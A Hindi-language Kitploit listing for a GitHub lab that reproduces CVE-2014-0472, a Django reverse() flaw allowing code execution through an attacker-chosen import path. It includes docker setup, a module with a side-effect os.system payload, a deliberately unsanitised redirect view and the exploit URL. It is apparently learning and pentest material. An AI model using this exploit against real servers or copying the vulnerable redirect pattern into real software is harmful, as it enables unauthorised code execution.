Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-0472 — CVE-2014-0472 Django में reverse() का उपयोग करके अप्रत्याशित कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/christasa/cve-2014-0472
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Django में reverse() का उपयोग करके अप्रत्याशित कोड निष्पादन

रिपॉजिटरी देखें
715 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-0472

उपयोग करें

root@kitploit:~
docker-compose up -d

localhost:8083 तक पहुंचें

संदर्भ: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. एक या अधिक व्यू (views) मौजूद हैं जो उपयोगकर्ता इनपुट के आधार पर URL बनाते हैं (आमतौर पर, क्वेरीस्ट्रिंग में एक "next" पैरामीटर जो किसी कार्रवाई के सफल समापन पर रीडायरेक्ट करने का स्थान इंगित करता है)।
  2. एक या अधिक मॉड्यूल हमलावर को सर्वर के Python आयात पथ पर मौजूद होने के लिए ज्ञात होते हैं, जो आयात करने पर दुष्प्रभावों के साथ कोड निष्पादन करते हैं।

tests.py में

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

views.py में

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

रीडायरेक्ट फ़ंक्शन का उपयोग करके evil फ़ंक्शन को कॉल करें

avater

exp का उपयोग करें

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

शोषण किया गया

avater

टूल डाउनलोड करें